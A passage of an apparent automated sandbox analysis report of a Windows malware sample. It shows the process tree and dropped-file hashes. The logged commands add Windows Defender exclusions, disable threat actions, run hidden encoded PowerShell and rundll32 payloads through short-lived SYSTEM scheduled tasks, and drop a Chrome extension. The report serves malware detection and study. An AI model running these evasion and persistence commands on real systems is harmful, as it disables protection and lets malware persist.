C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:324⤵PID:716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:644⤵PID:904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:324⤵PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:644⤵PID:1596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:324⤵PID:1012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:644⤵PID:1052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:324⤵PID:3044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:644⤵PID:908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:324⤵PID:1948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:644⤵PID:2324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:324⤵PID:2644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:644⤵PID:784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:1048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:324⤵PID:2444
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:644⤵PID:2428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:324⤵PID:2092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:644⤵PID:2128
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpjOVCSmH" /SC once /ST 16:34:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2624
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpjOVCSmH"3⤵PID:2920
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpjOVCSmH"3⤵PID:2780
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2328
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2024
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2216
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2304
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WFVPvOFzrjCnPPlbL" /SC once /ST 21:58:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\mzorGjf.exe\" 7d /boNqdiduI 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2076
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WFVPvOFzrjCnPPlbL"3⤵PID:1868
-
-
-
C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\mzorGjf.exeC:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\mzorGjf.exe 7d /boNqdiduI 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1236 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:2956
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:3036
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2840
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:2284
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:2544
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:1580
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:652
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:804
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:1104
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:1748
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:2604
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1436
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2268
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:2392
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:2880
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2084 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:1988
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "butYHpXTvMdZIJsEKZ"3⤵PID:812
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:604
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:2852
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:1424
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1260 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1188
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:280
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:2640
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2448
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\tffvHWJZU\TvFnMd.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "oiGBDDjiIQmhwtu" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1500
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "oiGBDDjiIQmhwtu2" /F /xml "C:\Program Files (x86)\tffvHWJZU\AjNDrpB.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1436
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oiGBDDjiIQmhwtu"3⤵PID:1420
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oiGBDDjiIQmhwtu"3⤵PID:1460
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mVOvxPujqogGhF" /F /xml "C:\Program Files (x86)\REeMUtPoCvFU2\qyKqqKg.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2500
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PuKixiXcCNlkt2" /F /xml "C:\ProgramData\NGysLhxJEZNwhMVB\LSwYRZv.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2688
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PNkVCGbsoOwbzBvhS2" /F /xml "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\SoMuMtV.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2396
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OEjxyANCnYwFWrViDzJ2" /F /xml "C:\Program Files (x86)\kLpsRMujXEpbC\cqRHAex.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:844
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dSPsRFCNvoTMekFez" /SC once /ST 09:04:55 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\mrYrpJCpOmktZWwz\PtDLaWSh\HFEoPxA.dll\",#1 /ZMsgdidIMb 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1680
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "dSPsRFCNvoTMekFez"3⤵PID:1012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WFVPvOFzrjCnPPlbL"3⤵PID:2452
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\mrYrpJCpOmktZWwz\PtDLaWSh\HFEoPxA.dll",#1 /ZMsgdidIMb 5254032⤵PID:1052
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\mrYrpJCpOmktZWwz\PtDLaWSh\HFEoPxA.dll",#1 /ZMsgdidIMb 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2612 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dSPsRFCNvoTMekFez"4⤵PID:280
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {6F0AD1F3-AEF4-4D49-B97E-2D041C2AB0C9} S-1-5-21-2248906074-2862704502-246302768-1000:GHPZRGFC\Admin:Interactive:[1]1⤵PID:1752
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1808 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:344
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1048 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2656
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2476
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1880
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2448
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-9810217432091145388-81785986485366606913505707161746851909482775361-1851771877"1⤵PID:2944
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1944112299-8267708391359708871856143539-8925859301503497052-15396749221966284003"1⤵PID:2036
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-913420355-18370183444678697951321006659-10555748301735657239-832485770-740082910"1⤵PID:2016
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-604798990865023164-143418402315906561267291400-1456159123618672526-517593075"1⤵PID:2404
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "29097795935997045-180781363-2114024906208665760-1991160247-1694351314-1368244833"1⤵PID:344
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1733668110-1219128268166121262020196325711420413565671317521-2201941091171284487"1⤵PID:2504
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2108
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5e94a08dfab59a4838cdadadc54bab864
SHA15c9f764d71a511925f11faf63c1f5c74c1176839
SHA256f868a6b73a5db884e0c2c85581061bd1e6290c156ce0a930586440bc3344a711
SHA5128a8fff186d1364bfd5de4122d033be636225beb4840d93fad5261e453159bfe7d78b40ee3a0707f9fc05d7554139f726e6ead0878feb54b3a8ae7c65bca3a612
-
Filesize
2KB
MD509afa71e1eb3fffcb665eddebeba4a51
SHA158b2afe24ba0ed7efaaee6bb51b88debc0ac4a9d
SHA256561d4510aa4bcb6b1dca8d4ee992be2465f7708c10f09d28852d670229f6555c
SHA512a1fae9d3978bfcb4a0c6efabf20c9ecf43c4cc7c17c47b1bb488fd13baacd94709327f3452f57ad7d474d63b1c83d487bf5cf594cc60aaec556157283a26c607
-
Filesize
2KB
MD52ba6605cbd0fd94c6271d4974e2ad951
SHA1888c218c378afcecebb6f4aacb46c3bd8f4c894a
SHA256002f17b33be5850a90bd5e2a38a63ab71e3e2c554e83eef19679fdeeffa54215
SHA512cca82ef99b7d727d902b0a6ae0bd5ca6d30e838a4d635f75526d84e4747abbbfdc9f11b4ebbc0d2cfa13469ba232abbceb6d4a305b6df33a6b864629e40f3ef3
-
Filesize
2KB
MD5118c11493a9873fd162a553f0d058c06
SHA19badaa33b45f39db1a0111c701f5602a7baf9c54
SHA2565a4f7dfb83b7b9b8009157719f0374c845aec677a5a92af24bab4a57b7d8473f
SHA512e4ecafd6ad42e82aad083b008131fe739c47fd448dcecbaeb7f7f25f0dac49d51289a54b8a3454f6c8ba05ec1e18d707affeea7bdeec73b26a566ef50101f00f
-
Filesize
2.5MB
MD5a11b27b2b4d62c21c95856e84ce9f573
SHA1e8734d907552058b61271323ca22ebc1f5eb9b66
SHA256ccd00d1b0b42f4c4a83c2b399e0aab6b629e931627502909b8eaff004acde7f4
SHA51248ed507cc054c5198c57cc157ae53417fc35491c72ce79e6a4c8733dbcd71d2f0b2c0b1a8a6734306ac5a7c023075e6410aec8b47b8a88fc22e7bfee209e309e
-
Filesize
2KB
MD50852978332dbb8205f02bba43cf71bee
SHA1d0286d1cb6a17c1a7a1ecdeae5efc33a91acba5b
SHA256e77026c4cd77a03fd26506f3ee3380a5598987271abbed56daa08d50e83e42c7
SHA512619420b0f57331c3d0838717de95c935fbf061b677d34a6e87e4b2222571a73882356d2c6c911a61fcd185614e3a4ef4dda86590a569c9001f80f5091ff2a062
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD582b97ad0844a26053dbab3741ea11b69
SHA1ac3007081f199f2cb48ca4dd692ef91d57052187
SHA2563f2623d4d6c42b657f92b817b531e65a86ca37675afd4879ac7ddcde9d29f6e0
SHA512949bd3ff13d9558320046b80ebe9370352f557a541779949c4a1b99ecb143c972338494052a48fe8b9e1324fc226ca68af5ac3a13388b5e81a98cc70ebb8dd1a
-
Filesize
27KB
MD590f57b8a4719bcabab3d8241a3110c62
SHA125897a2c92408e2c182bb2dadb4509a1584ef878
SHA256c366d397c63a8bddf33fad7c60074b6196ce4641f1933c89f8eb40e3d7f43016
SHA51232c93ad5dc555bee5b5052c99714ca6099be67dd90123208061d7dda040117f4158a1946c4c5456c31663e6b61a710b6fcddc8ddcfe683568d24c38c99502830
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5130509bdd6ec2b4e1a4ef4b0ed81e6cf
SHA19aaa2cc17982a06197b05f317c7c10767a1ee98c
SHA256dc3ef94e754571f695c318007d60f39c2b33de712ec7df9bf1d2081952204eae
SHA512cc59de93ccfd1e91fc246e20bad372932b8a49300a4dc470fb1d37b59ac4e0d04c500919dd1f75b29852dfd9d05fabe3f1a65733c8d21ff996e9cb5bd61e70ae
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5a71fb5bec59514ef37d15138f0734372
SHA1ce60397015ac89fd2333dc895dc96e049a3c06ed
SHA2561a7f64751adab9799504d107ed5be5626e6df0ead898e479df0cf0b5d7e9eca9
SHA512f6031d960ade89d3850f899ddde9583ed39e35215083bd6eddadfc0c6a0a90c91f7e54d1404281d9656e97b5fedf336362d35fcf80e736c5e499b513bc84c2da
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD50aef7e84b03ea1fd6b0d14ba5d261e22
SHA1e50dd68a61f2dcdf4735199533d05742766b2306
SHA256ec6d7c512fe86aa771f884a4c9342f850419442e7c80f55c591d195beb5ada27
SHA5126a40c389fd0c6f271edeb2151e81db092e3b357e0f7cca5f913184ddbb1d32a10e3990717ae03f23c3d6b600e8136eff9190af32e0756b5ae2ace32adc177d53
-
Filesize
6KB
MD5ac21b318b55d517ac71b130c10a60c9e
SHA133c0d4dec4f95b27cdb8f606bc5fa11daaf35ded
SHA2567b8c08acf06490d50fbb62bb567fbf944807368c933d5ec60861e966e65fe448
SHA512621094c8b3fa1ed0c31b79dee74ed1b7360d14eae9d58d18599d20e217bbf9ae5477a2f8025b85739ea092c40536978afbd24b50008f5c3ede0615872602a6b1
-
Filesize
6.4MB
MD52ab490e0b4b1767a1780c820fea740f1
SHA181a97ba2e6b1b98d2597790f76d269e6c3d43449
